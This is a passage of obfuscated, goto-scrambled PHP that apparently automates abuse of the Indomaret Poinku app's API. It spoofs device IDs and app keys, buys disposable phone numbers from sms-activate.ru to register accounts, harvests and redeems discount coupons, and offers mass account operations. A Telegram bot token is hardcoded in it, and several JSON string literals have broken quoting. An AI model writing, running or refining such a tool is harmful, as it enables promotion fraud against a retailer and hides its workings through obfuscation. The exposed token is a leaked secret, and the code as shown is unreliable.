  $owfHy = json_decode($SpzvW, true); 
  goto f4TNt; 
  dIp9f: 
  AteVH: 
  goto gHwT9; 
  o6Pof: 
  bLHjw: 
  goto J8niW; 
  L1Xq4: 
  echo "
"; 
  goto YRNTC; 
  j1jXq: 
  $Jk9cx = g8pF2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/skip-module/tr-skip-module", $aY0el, $GOXkU, $mlMLt); 
  goto i29Nz; 
  eFo7K: 
  $xp_1p = "indo.txt"; 
  goto Z6h6f; 
  fvvse: 
  $I2tFV = @$owfHy["data"]["content"][$fM3_G]["amount"]; 
  goto AYcyu; 
  kO9o0: 
  echo "
"; 
  goto Et81j; 
  bsyt4: 
  echo "\xa"; 
  goto okBv5; 
  wURJg: 
  $vzRG5 = xoZB4(array("|"), $mQ1PX)[0]; 
  goto DA1mz; 
  D3NTE: 
  $ZqwwP = @$owfHy["data"][0]["district"]["keyword"]; 
  goto Wo0m2; 
  ylkt4: 
  $zvt88 = $QRhbE; 
  goto ca3bq; 
  BLyzs: 
  echo $yy9BI . ". "; 
  goto XtD9W; 
  ulLqL: 
  jACUo: 
  goto rMSj8; 
  oEEsC: 
  $lPULW = $m0f8X; 
  goto P7f3o; 
  xwhDi: 
  function Rzrv9($lEbop) 
  { 
    goto Iwx2X; 
    gBB07: 
    if (!$P7lm9) { 
      goto oHvIP; 
    } 
    goto PZ1X3; 
    zcwrR: 
    return $ECuqv; 
    goto pU2Ki; 
    y2fbZ: 
    print_r($AXlcQ); 
    goto zcwrR; 
    TVXlG: 
    I1_tl: 
    goto x4uwP; 
    dXYuP: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto D37sG; 
    x4uwP: 
    $AXlcQ = json_decode($y7f11, true); 
    goto y2fbZ; 
    AyXe4: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto MRgQk; 
    MRgQk: 
    goto I1_tl; 
    goto HguiC; 
    W9Xhi: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto gBB07; 
    dnhN_: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto ovyF7; 
    xwJqc: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto frkr8; 
    ORVvW: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto M31yw; 
    UdUFv: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto RXXua; 
    jvl5U: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto UdUFv; 
    Iwx2X: 
    $C6npe = curl_init(); 
    goto dnhN_; 
    frkr8: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto jvl5U; 
    HguiC: 
    oHvIP: 
    goto GNw1I; 
    D37sG: 
    $ruc3h[] = "User-Agent: okhttp/5.0.0-alpha.5"; 
    goto ORVvW; 
    GNw1I: 
    return false; 
    goto TVXlG; 
    PZ1X3: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto AyXe4; 
    ovyF7: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto dXYuP; 
    RXXua: 
    $ECuqv = curl_exec($C6npe); 
    goto W9Xhi; 
    M31yw: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto xwJqc; 
    pU2Ki: 
  } 
  goto wE6Ao; 
  tT8Ow: 
  echo @zM6ic("red", "Yah... Ayam Nya Ga Ada , Akan Di Cek Kembali..."); 
  goto j_17H; 
  buUjn: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto yJoIl; 
  fbjNT: 
  $kCT0W = str_replace("-", '', $cod3H); 
  goto gIKVK; 
  Sswct: 
  $egras = "5553166883:AAH-PUR2AQcNBi-UETHM2_-coBaua9Q1ja4"; 
  goto UFzvu; 
  Gni3W: 
  $zcN5u = XoZB4(array("|"), $wZnHP)[0]; 
  goto BGYQ7; 
  q_khU: 
  echo "
"; 
  goto SVrQX; 
  kyIGl: 
  kqBxp: 
  goto snP1r; 
  Y6dlB: 
  $zcN5u = xOZb4(array("|"), $tqWr2)[0]; 
  goto WvdVD; 
  EXHsP: 
  function XTCVu($lEbop, $wDisp = null, $n0sON) 
  { 
    goto bpj0U; 
    UCewC: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto GUb3g; 
    DFlSj: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto WFd8N; 
    WFd8N: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto Cmhzz; 
    Ytw1u: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto HjPGA; 
    cOQhT: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto nMyWl; 
    jqIyQ: 
    return false; 
    goto Yu6AC; 
    bpj0U: 
    $C6npe = curl_init(); 
    goto vZvGe; 
    Yu6AC: 
    yZ8P6: 
    goto TeXRk; 
    cvAHs: 
    print_r($AXlcQ); 
    goto ZikXy; 
    swYS9: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto iHYoU; 
    Cmhzz: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto UCewC; 
    TeXRk: 
    $AXlcQ = json_decode($y7f11, true); 
    goto cvAHs; 
    XhZjp: 
    $ruc3h[] = "authorization: Bearer " . $qaj_8; 
    goto xtV2d; 
    xtV2d: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto b0Ahu; 
    pmHNY: 
    E5AKl: 
    goto jqIyQ; 
    VQkKM: 
    goto yZ8P6; 
    goto pmHNY; 
    vZvGe: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto cOQhT; 
    o8Dz9: 
    if (!$P7lm9) { 
      goto E5AKl; 
    } 
    goto Ytw1u; 
    GUb3g: 
    $ECuqv = curl_exec($C6npe); 
    goto EAGNH; 
    b0Ahu: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto DFlSj; 
    iHYoU: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto xAHfn; 
    HjPGA: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto VQkKM; 
    EAGNH: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto o8Dz9; 
    nMyWl: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto swYS9; 
    xAHfn: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto XhZjp; 
    ZikXy: 
    return $ECuqv; 
    goto aFLyy; 
    aFLyy: 
  } 
  goto t4WY0; 
  Ud9mO: 
  echo @zm6ic("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto KSFIU; 
  YyGNN: 
  QWuXy: 
  goto dXN8c; 
  s6kmZ: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto kMWxV; 
  zMUhZ: 
  $Ipl73 = @$owfHy["data"][$dQ8Tp]["province"]; 
  goto C4GzD; 
  U5zus: 
  if (!($rVPVc == '')) { 
    goto r9C2_; 
  } 
  goto Qm56f; 
  NO6kH: 
  $H1g60 = json_decode($a7K8a, true); 
  goto MeZfL; 
  IGAYC: 
  @unlink("chace"); 
  goto zYTlH; 
  Zkmak: 
  $XDyMm = G8Pf2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons/has-new-coupon", $aY0el, $GOXkU, $mlMLt); 
  goto Lf5WQ; 
  hL1pe: 
  print_r($zcN5u); 
  goto wb_0Q; 
  TUrUS: 
  $KbHJf = rand(1000000, 9999999); 
  goto YrlkR; 
  C_tuY: 
  echo "Error deleting {$xp_1p} "; 
  goto LLunD; 
  wMsWI: 
  @unlink("poinhp.php"); 
  goto cwAz7; 
  FqbQV: 
  function nW0aQ($lEbop, $wDisp = null) 
  { 
    goto dbmyU; 
    UpmsT: 
    return $ECuqv; 
    goto fGGRb; 
    dlJnh: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto zt5oL; 
    vlx2Z: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto VBy7S; 
    RGzgu: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto cUtMy; 
    qyaxt: 
    goto kAqFN; 
    goto tZuqX; 
    b1OGS: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto X_uSQ; 
    q_Ayx: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto kMobk; 
    cUtMy: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto qyaxt; 
    dbmyU: 
    $C6npe = curl_init(); 
    goto dlJnh; 
    GJ7VZ: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto vlx2Z; 
    OJBN_: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto q_Ayx; 
    pUvMv: 
    kAqFN: 
    goto hy5rs; 
    qDNH2: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto FRSps; 
    tZuqX: 
    FasBy: 
    goto DE6cn; 
    X_uSQ: 
    if (!$P7lm9) { 
      goto FasBy; 
    } 
    goto RGzgu; 
    hy5rs: 
    $AXlcQ = json_decode($y7f11, true); 
    goto stn1q; 
    VBy7S: 
    $ECuqv = curl_exec($C6npe); 
    goto b1OGS; 
    kMobk: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto qDNH2; 
    FRSps: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto kiuHv; 
    stn1q: 
    print_r($AXlcQ); 
    goto UpmsT; 
    JULtm: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto lkAf8; 
    lkAf8: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto OJBN_; 
    DE6cn: 
    return false; 
    goto pUvMv; 
    kiuHv: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto GJ7VZ; 
    zt5oL: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto JULtm; 
    fGGRb: 
  } 
  goto UumYp; 
  gCa6F: 
  echo @ZM6ic("yellow", "Kode Kuponnya  : "); 
  goto Q87m9; 
  mSjwl: 
  Lqjr6("mytoken", $zn5zd, $mlMLt); 
  goto YT9J8; 
  O5Ks7: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto xRR6X; 
  Qb11N: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto ukSNL; 
  mDHN7: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto EIB0l; 
  sUm5u: 
  echo "\xa"; 
  goto HNP2O; 
  CGTag: 
  echo @ZM6IC("yellow", " - Segala Bentuk Kerugian Anda Bukan Tanggung Jawab Kami
"); 
  goto gkcvz; 
  fqUMI: 
  echo "\xa"; 
  goto CGa35; 
  GhSTa: 
  echo @zm6ic("yellow", $qaGLY); 
  goto gylcc; 
  nxIft: 
  goto y1Iam; 
  goto l7PYF; 
  qBG1z: 
  aX9fj: 
  goto X1rFz; 
  GpGXd: 
  echo @ZM6iC("green", "Kota Ke : "); 
  goto xPuMO; 
  nlTa3: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"click_link","event_timestamp":" . $nb9cm . ","link_label":"Selesai"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto k_cPh; 
  sde23: 
  echo @zM6ic("red", $qtgR3); 
  goto zYTRQ; 
  i1ZXy: 
  echo "
"; 
  goto es2VB; 
  aVRdS: 
  UI83C: 
  goto SleGX; 
  nT7ar: 
  echo "
"; 
  goto aZLkI; 
  ppWla: 
  $yy9BI; 
  goto vSSuK; 
  zwaNA: 
  echo "Sampai Baris Ke : "; 
  goto uKX_I; 
  Jd2f7: 
  $jTEU0++; 
  goto J_qYQ; 
  ufC5L: 
  function G8pf2($lEbop, $aY0el, $GOXkU, $mlMLt) 
  { 
    goto b4yFa; 
    nMf4M: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto J9r2E; 
    WrCD3: 
    return false; 
    goto Vdugx; 
    Vdugx: 
    XHelQ: 
    goto zsBt5; 
    scSkM: 
    $ruc3h[] = "user-agent: okhttp/5.0.0-alpha.2"; 
    goto UdaZl; 
    DiIOE: 
    if (!$P7lm9) { 
      goto Uejy4; 
    } 
    goto u4786; 
    TXsAg: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto DiIOE; 
    x5FoK: 
    Uejy4: 
    goto WrCD3; 
    ChtY7: 
    $ruc3h[] = "apps: {"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto DPrr2; 
    TdcCt: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto XzBfM; 
    u4786: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto cBJCN; 
    o5HUi: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto ChtY7; 
    MBJIF: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto TdcCt; 
    nsawj: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto o5HUi; 
    KfQdO: 
    $ECuqv = curl_exec($C6npe); 
    goto TXsAg; 
    u20Ci: 
    goto XHelQ; 
    goto x5FoK; 
    J9r2E: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto cvLnJ; 
    cBJCN: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto u20Ci; 
    b4yFa: 
    $C6npe = curl_init(); 
    goto MBJIF; 
    etFar: 
    return $ECuqv; 
    goto XTnUt; 
    cvLnJ: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto KfQdO; 
    UdaZl: 
    $ruc3h[] = "authorization: Bearer " . $mlMLt; 
    goto nsawj; 
    nhXNt: 
    print_r($AXlcQ); 
    goto etFar; 
    zsBt5: 
    $AXlcQ = json_decode($y7f11, true); 
    goto nhXNt; 
    VvoNr: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto nMf4M; 
    XzBfM: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto scSkM; 
    DPrr2: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto VvoNr; 
    XTnUt: 
  } 
  goto dnr_q; 
  wtGUU: 
  if (!unlink($xp_1p)) { 
    goto CVvEu; 
  } 
  goto fZZU1; 
  QM3hr: 
  $zn5zd = $U0YgX; 
  goto Hwq1l; 
  U0V1s: 
  $efQM2 = count($QRhbE) - 1; 
  goto jFIe0; 
  DTm09: 
  echo "\xa"; 
  goto FhaVw; 
  VEc6T: 
  $wDisp = ''; 
  goto GdD0b; 
  VZLLC: 
  die; 
  goto xEaWV; 
  zxj7y: 
  echo "
"; 
  goto TU0CC; 
  mH2RK: 
  echo "
\xa"; 
  goto Zu6S2; 
  GxIi2: 
  $zcN5u = XozB4(array("|"), $tqWr2)[0]; 
  goto KsSFo; 
  x_9e2: 
  echo "\xa"; 
  goto dRer4; 
  WjCv6: 
  echo "Sampai Baris Ke : "; 
  goto Qz1nu; 
  zB761: 
  $yy9BI = "0"; 
  goto qNkJO; 
  nbiw6: 
  if (!unlink($xp_1p)) { 
    goto MG_Ix; 
  } 
  goto GFo6V; 
  Ca9kW: 
  $m5BZY = GgGr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto NV5lO; 
  cDfRg: 
  $E_1ED = $oNl8L; 
  goto nxHbq; 
  LP87k: 
  $S8W9D = trim(fgets(STDIN)); 
  goto UsRXR; 
  nROSQ: 
  $obc_G = str_replace("\xd", '', $wlJRC); 
  goto YDdPQ; 
  Elr14: 
  R1QlS("poin", $rVPVc); 
  goto w6iKL; 
  F5zB5: 
  echo "
"; 
  goto cqT9Y; 
  OZ3eG: 
  echo "
"; 
  goto VE_Bb; 
  uBgC6: 
  echo "Sampai Baris Ke : "; 
  goto q9Tbh; 
  cCVTp: 
  die; 
  goto xgO0j; 
  pLTqx: 
  echo "Sampai Baris Ke : "; 
  goto QtF47; 
  N6E3V: 
  echo "
"; 
  goto ZDI74; 
  RYVIS: 
  echo "
"; 
  goto PjzOJ; 
  kMlqh: 
  if (!($fUekS == '')) { 
    goto dlkR6; 
  } 
  goto ngE2Z; 
  y8Khm: 
  die; 
  goto GysqL; 
  YZCxr: 
  echo "
"; 
  goto k0I3d; 
  N1cO9: 
  echo @zM6ic("nevy", "Akun Ke    : "); 
  goto bVfIJ; 
  VlP2H: 
  echo @zm6iC("green", $LgiFv); 
  goto yyrGC; 
  rss7A: 
  echo @Zm6iC("yellow", "Nama Provinsi  : "); 
  goto yPK1R; 
  lZyiz: 
  IDXKw: 
  goto SqoPf; 
  qkqcs: 
  echo $BcbF3; 
  goto c6kVn; 
  AmZDN: 
  die; 
  goto GazWF; 
  W1xiW: 
  $v1ZMX = str_replace("
", '', $wPFxB); 
  goto s24Xx; 
  BUEN3: 
  oFiiw: 
  goto I61fI; 
  z92mg: 
  echo @ZM6iC("nevy", "Proses Verifikasi Device ID, Mohon Tunggu .."); 
  goto qj7Ip; 
  Vy0Lw: 
  $b2ucB = @$owfHy["data"][0]["district"]["cityName"]; 
  goto MDPdh; 
  VtmJu: 
  goto EDwN1; 
  goto IwEkL; 
  XAUCG: 
  echo @zm6ic("yellow", "Kode Kuponnya  : "); 
  goto KIXqn; 
  S2q_E: 
  echo "\xa"; 
  goto G3zOO; 
  N6fB1: 
  echo "
"; 
  goto NaHpn; 
  U8SH2: 
  echo @zm6Ic("yellow", "Poin Akun Anda : "); 
  goto IRVRS; 
  eqV69: 
  if ($pew2b == "Diskon Rp 25.000 Klik Indomaret") { 
    goto ybEa9; 
  } 
  goto eYvyG; 
  jYGp4: 
  echo "\xa"; 
  goto XdjRG; 
  azsEt: 
  function fq6W0() 
  { 
    return sprintf("%04x%04x%04x%04x", mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xfff) | 0x4000, mt_rand(0, 0x3fff) | 0x8000, mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff)); 
  } 
  goto P5IMs; 
  S8Kqs: 
  echo "\xa"; 
  goto jd00O; 
  nw32r: 
  @unlink("poin"); 
  goto i5AD_; 
  K_dMT: 
  echo @zM6ic("nevy", $Y031U); 
  goto Vg1v6; 
  SlPSt: 
  JkuZC: 
  goto BLyzs; 
  rihYD: 
  $wlJRC = XOzb4(array("|"), $wZnHP)[1]; 
  goto jk3HC; 
  uP7Pk: 
  if (!unlink($xp_1p)) { 
    goto DiWXR; 
  } 
  goto EzY9G; 
  Rdfo1: 
  echo "
"; 
  goto PMZGw; 
  RB7vh: 
  $qtgR3; 
  goto z1S5b; 
  f9zo8: 
  CqA3L: 
  goto gzViQ; 
  tyzFG: 
  $H1g60 = json_decode($a7K8a, true); 
  goto hwyFK; 
  HVxni: 
  $efQM2 = count($QRhbE) - 1; 
  goto BrlON; 
  mA2X2: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto GHDOx; 
  OUMdr: 
  $rVPVc = trim(fgets(STDIN)); 
  goto Elr14; 
  ULTAl: 
  @unlink("poinhp.php"); 
  goto vImzz; 
  uLkd3: 
  echo @Zm6Ic("nevy", $ABmxY); 
  goto OMsUG; 
  lDBc5: 
  $ZNU2M = preg_replace("/[^a-zA-Z0-9\ ]/", '', $ZNU2M); 
  goto Lskq2; 
  i4e5N: 
  echo "
"; 
  goto b8f1e; 
  ha1Vp: 
  Jcs9o: 
  goto OlQAM; 
  JIw4j: 
  echo @zM6iC("red", $ZXjwY); 
  goto jfQhS; 
  E9Kac: 
  if (!($yy9BI < $DxrJr)) { 
    goto r2lQG; 
  } 
  goto OJgKJ; 
  IxSOI: 
  $cod3H = Fq6W0(); 
  goto fbjNT; 
  h2nah: 
  function CZLoa($lEbop, $wDisp = null) 
  { 
    goto l1hYE; 
    uC_Au: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto vVcLj; 
    ZiXut: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto jJJuo; 
    kW4Op: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto qdmAr; 
    T_ADe: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto uC_Au; 
    DGypN: 
    return false; 
    goto fxvpg; 
    easOE: 
    $ruc3h[] = "Content-Type: application/json"; 
    goto IY2Tx; 
    ff2HW: 
    if (!$P7lm9) { 
      goto qEFzb; 
    } 
    goto T_ADe; 
    QDBA3: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto easOE; 
    OlTXb: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto dAM7n; 
    WLnvH: 
    qEFzb: 
    goto DGypN; 
    Vc65P: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto ff2HW; 
    IY2Tx: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto AOXsX; 
    nTyvs: 
    $AXlcQ = json_decode($y7f11, true); 
    goto Z_1Et; 
    jJJuo: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto iVh81; 
    dAM7n: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto goNTz; 
    l1hYE: 
    $C6npe = curl_init(); 
    goto kf8j1; 
    AOXsX: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto OlTXb; 
    kf8j1: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto mq3kO; 
    Z_1Et: 
    print_r($AXlcQ); 
    goto Rmbjm; 
    vVcLj: 
    goto WRcS3; 
    goto WLnvH; 
    goNTz: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto kW4Op; 
    fxvpg: 
    WRcS3: 
    goto nTyvs; 
    qdmAr: 
    $ECuqv = curl_exec($C6npe); 
    goto Vc65P; 
    Rmbjm: 
    return $ECuqv; 
    goto eI5vj; 
    iVh81: 
    $ruc3h[] = "User-Agent: okhttp/5.0.0-alpha.5"; 
    goto QDBA3; 
    mq3kO: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto ZiXut; 
    eI5vj: 
  } 
  goto xwhDi; 
  D1f2D: 
  echo "
"; 
  goto AT7qk; 
  yxAIq: 
  $DxrJr = "100000000000000000"; 
  goto xwqH3; 
  DmLJx: 
  echo "\xa"; 
  goto ZH85O; 
  licpJ: 
  eYgid: 
  goto bkHpK; 
  hF6Lb: 
  if ($ucJzj == "Diskon Rp 25.000 Klik Indomaret") { 
    goto rCf0L; 
  } 
  goto lY4tW; 
  m5ULx: 
  echo $jTEU0; 
  goto Akd3I; 
  eWqTD: 
  function YURsE($FK_yc, $bQedf, $p5fm4) 
  { 
    goto sFVgN; 
    sFVgN: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto H_IBL; 
    H_IBL: 
    fputs($FhLCi, "{$bQedf} = {$p5fm4}
"); 
    goto QJmoA; 
    QJmoA: 
    fclose($FhLCi); 
    goto BrSL1; 
    BrSL1: 
  } 
  goto Y6mvl; 
  DbkXw: 
  function cwALz($lEbop, $wDisp = null, $aY0el, $GOXkU, $mlMLt) 
  { 
    goto JcDVM; 
    dvwOv: 
    $ECuqv = curl_exec($C6npe); 
    goto xW36T; 
    JcDVM: 
    $C6npe = curl_init(); 
    goto Jyhj4; 
    fEX1j: 
    $AXlcQ = json_decode($y7f11, true); 
    goto NJ3UF; 
    QsC1y: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto HoLuL; 
    jw6RG: 
    goto mODPI; 
    goto VzERk; 
    Jyhj4: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto j_uB3; 
    msTKs: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto i7vou; 
    o0D3s: 
    $ruc3h[] = "authorization: Bearer " . $mlMLt; 
    goto UAtB2; 
    qYbEM: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto mIPrE; 
    mIPrE: 
    $ruc3h[] = "apps: {"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto UFFaE; 
    xWF0L: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto VkCXG; 
    xW36T: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto lQCaZ; 
    i7vou: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto o0D3s; 
    lQCaZ: 
    if (!$P7lm9) { 
      goto D5Y5a; 
    } 
    goto QsC1y; 
    dqzzv: 
    return false; 
    goto LiWDy; 
    ptNrg: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto xWF0L; 
    UAtB2: 
    $ruc3h[] = "user-agent: okhttp/5.0.0-alpha.5"; 
    goto co3Rl; 
    SS9Vf: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto ptNrg; 
    d3kjh: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto SS9Vf; 
    LiWDy: 
    mODPI: 
    goto fEX1j; 
    co3Rl: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto qYbEM; 
    j_uB3: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto msTKs; 
    VkCXG: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto dvwOv; 
    VzERk: 
    D5Y5a: 
    goto dqzzv; 
    HoLuL: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto jw6RG; 
    NJ3UF: 
    print_r($AXlcQ); 
    goto e6Bs3; 
    UFFaE: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto d3kjh; 
    e6Bs3: 
    return $ECuqv; 
    goto LpSdB; 
    LpSdB: 
  } 
  goto iIHZS; 
  KOkWb: 
  echo @zm6Ic("yellow", "Build By FERDY RAMADHAN "); 
  goto IaTZ8; 
  snQTX: 
  echo @zm6ic("yellow", " 8 . Pecah Ayam Masal\xa"); 
  goto IMOnB; 
  pQDNX: 
  if (file_exists('kodevoc.txt')) { 
    $kodekode = file_get_contents("kodevoc.txt"); 
    echo "$kodekode\n"; 
    goto drear; 
  } 
  echo "Masukkan Kode :"; 
  $kodekode = trim(fgets(STDIN)); 
  drear: 
  $wDisp = '{"couponPromoCode":"$kodekode"}'; 
  goto BoJhr; 
  uJSyf: 
  echo "

"; 
  goto PKPd6; 
  c6hC1: 
  $zcN5u = XOZB4(array("|"), $tqWr2)[0]; 
  goto vlvmc; 
  YXEEi: 
  $earOL = $sONlZ; 
  goto RbmA4; 
  a1rFf: 
  $earOL = $sONlZ; 
  goto naftu; 
  C5uyC: 
  echo "
"; 
  goto OqLtw; 
  f_eFW: 
  $zvt88 = $QRhbE; 
  goto cZsTg; 
  fTF4v: 
  echo "\xa"; 
  goto PqKxD; 
  wPJ_E: 
  echo "\xa"; 
  goto yCvFa; 
  SXlr7: 
  $jze6k = Ww9VQ("https://sms-activate.ru/stubs/handler_api.php?owner=5&country=6&api_key=" . $rVPVc . "&service=ju&forward=0&action=getNumber&sessionId=86f4bf31c145b15d073d5bd58bc9120e&operator=any", $wDisp); 
  goto gZ9Oc; 
  WE5C6: 
  if (!($ABmxY == "Success")) { 
    goto Zfg2N; 
  } 
  goto lTdia; 
  p4Gny: 
  echo @ZM6IC("green", "Masih dalam jangka waktu, Jika Expired Hubungi Creator!!"); 
  goto sDo5R; 
  Ul2z5: 
  $Jk9cx = g8pf2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/sy-app-version/get-version-key/ANDROID", $aY0el, $GOXkU, $mlMLt); 
  goto fH8o7; 
  WGgVd: 
  $owfHy = json_decode($XTuz1, true); 
  goto aGFhl; 
  vGgFB: 
  if ($KMaT7 == "DELIVERY") { 
    goto GWmgR; 
  } 
  goto yJWDH; 
  rH2UI: 
  vh7kR: 
  goto LRFDy; 
  VvV7s: 
  echo "\xa"; 
  goto jm25w; 
  z_0dp: 
  if ($XDyMm == "1") { 
    goto htQmu; 
  } 
  goto gbJig; 
  fGnXq: 
  function g1wxt($lEbop, $wDisp = null, $aY0el, $GOXkU, $mlMLt) 
  { 
    goto EniPp; 
    ZGi3i: 
